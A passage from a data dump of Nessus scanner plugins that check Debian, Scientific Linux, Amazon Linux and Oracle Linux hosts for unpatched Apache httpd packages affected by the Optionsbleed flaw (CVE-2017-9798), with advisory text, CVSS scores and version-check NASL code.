exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"apache2\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-dbg\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-doc\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-event\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-itk\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-prefork\", 
reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-worker\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-prefork-dev\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec-custom\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-threaded-dev\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-utils\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-bin\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-common\", reference:\"2.2.22-13+deb7u12\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T13:50:14", "description": "Security Fix(es) :\n\n - A use-after-free flaw was found in the way httpd handled\n invalid and previously unregistered HTTP methods\n specified in the Limit directive used in an .htaccess\n file. A remote attacker could possibly use this flaw to\n disclose portions of the server memory, or cause httpd\n child process to crash. 
(CVE-2017-9798)", "edition": 15, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-12T00:00:00", "title": "Scientific Linux Security Update : httpd on SL7.x x86_64 (20171011) (Optionsbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "modified": "2017-10-12T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo", "p-cpe:/a:fermilab:scientific_linux:httpd-tools", "p-cpe:/a:fermilab:scientific_linux:httpd-manual", "p-cpe:/a:fermilab:scientific_linux:mod_ssl", "p-cpe:/a:fermilab:scientific_linux:mod_proxy_html", "p-cpe:/a:fermilab:scientific_linux:mod_session", "p-cpe:/a:fermilab:scientific_linux:httpd", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:mod_ldap", "p-cpe:/a:fermilab:scientific_linux:httpd-devel"], "id": "SL_20171011_HTTPD_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/103806", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103806);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL7.x x86_64 (20171011) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A use-after-free flaw was found in the way httpd handled\n invalid and previously unregistered HTTP methods\n specified in the Limit directive used in an .htaccess\n file. 
A remote attacker could possibly use this flaw to\n disclose portions of the server memory, or cause httpd\n child process to crash. (CVE-2017-9798)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1710&L=scientific-linux-errata&F=&S=&P=9988\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e195877f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-debuginfo-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"httpd-manual-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-67.el7_4.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-11-26T09:19:57", "description": "According to its banner, the version of Apache running on the remote\nhost is 2.4.x prior to 2.4.28. 
It is, therefore, affected by an HTTP\nvulnerability related to the <Limit {method}> directive in an \n.htaccess file.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-13T00:00:00", "title": "Apache 2.4.x < 2.4.28 HTTP Vulnerability (OptionsBleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "modified": "2017-10-13T00:00:00", "cpe": ["cpe:/a:apache:httpd", "cpe:/a:apache:http_server"], "id": "APACHE_2_4_28.NASL", "href": "https://www.tenable.com/plugins/nessus/103838", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103838);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/25\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_bugtraq_id(100872);\n\n script_name(english:\"Apache 2.4.x < 2.4.28 HTTP Vulnerability (OptionsBleed)\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache running on the remote\nhost is 2.4.x prior to 2.4.28. 
It is, therefore, affected by an HTTP\nvulnerability related to the <Limit {method}> directive in an \n.htaccess file.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.4.28\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.28 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9798\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:80);\n\napp_info = vcf::apache_http_server::combined_get_app_info(app:'Apache', port:port);\n\nconstraints = [\n { \"min_version\" : \"2.4\", \"fixed_version\" : \"2.4.28\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:19:40", "description": "Apache httpd allows remote attackers to read secret data from process\nmemory if the Limit directive can be set in a user's .htaccess file,\nor if httpd.conf has certain misconfigurations, aka Optionsbleed. The\nattacker sends an unauthenticated OPTIONS HTTP request when attempting\nto read secret data. 
This is a use-after-free issue and thus secret\ndata is not always sent, and the specific data depends on many factors\nincluding configuration.(CVE-2017-9798)", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-19T00:00:00", "title": "Amazon Linux AMI : httpd24 / httpd (ALAS-2017-896) (Optionsbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:mod24_ssl", "p-cpe:/a:amazon:linux:httpd24-manual", "p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:mod24_ldap", "p-cpe:/a:amazon:linux:mod24_proxy_html", "p-cpe:/a:amazon:linux:mod_ssl", "p-cpe:/a:amazon:linux:httpd24-tools", "p-cpe:/a:amazon:linux:httpd24-debuginfo", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:mod24_session", "p-cpe:/a:amazon:linux:httpd24-devel", "p-cpe:/a:amazon:linux:httpd24", "p-cpe:/a:amazon:linux:httpd-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-896.NASL", "href": "https://www.tenable.com/plugins/nessus/103309", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-896.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103309);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"ALAS\", value:\"2017-896\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 / httpd (ALAS-2017-896) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache httpd allows remote attackers to 
read secret data from process\nmemory if the Limit directive can be set in a user's .htaccess file,\nor if httpd.conf has certain misconfigurations, aka Optionsbleed. The\nattacker sends an unauthenticated OPTIONS HTTP request when attempting\nto read secret data. This is a use-after-free issue and thus secret\ndata is not always sent, and the specific data depends on many factors\nincluding configuration.(CVE-2017-9798)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-896.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update httpd24' to update your system.\n\nRun 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-debuginfo-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-devel-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-manual-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-tools-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ldap-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"mod24_proxy_html-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_session-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ssl-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.34-1.15.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T12:51:49", "description": "From Red Hat Security Advisory 2017:2882 :\n\nAn update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. 
(CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-12T00:00:00", "title": "Oracle Linux 7 : httpd (ELSA-2017-2882) (Optionsbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "modified": "2017-10-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:mod_session", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:mod_ldap", "p-cpe:/a:oracle:linux:httpd-tools", "p-cpe:/a:oracle:linux:mod_proxy_html"], "id": "ORACLELINUX_ELSA-2017-2882.NASL", "href": "https://www.tenable.com/plugins/nessus/103803", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:2882 and \n# Oracle Linux Security Advisory ELSA-2017-2882 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103803);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"RHSA\", value:\"2017:2882\");\n\n script_name(english:\"Oracle Linux 7 : httpd (ELSA-2017-2882) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:2882 :\n\nAn update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-October/007263.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_proxy_html\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
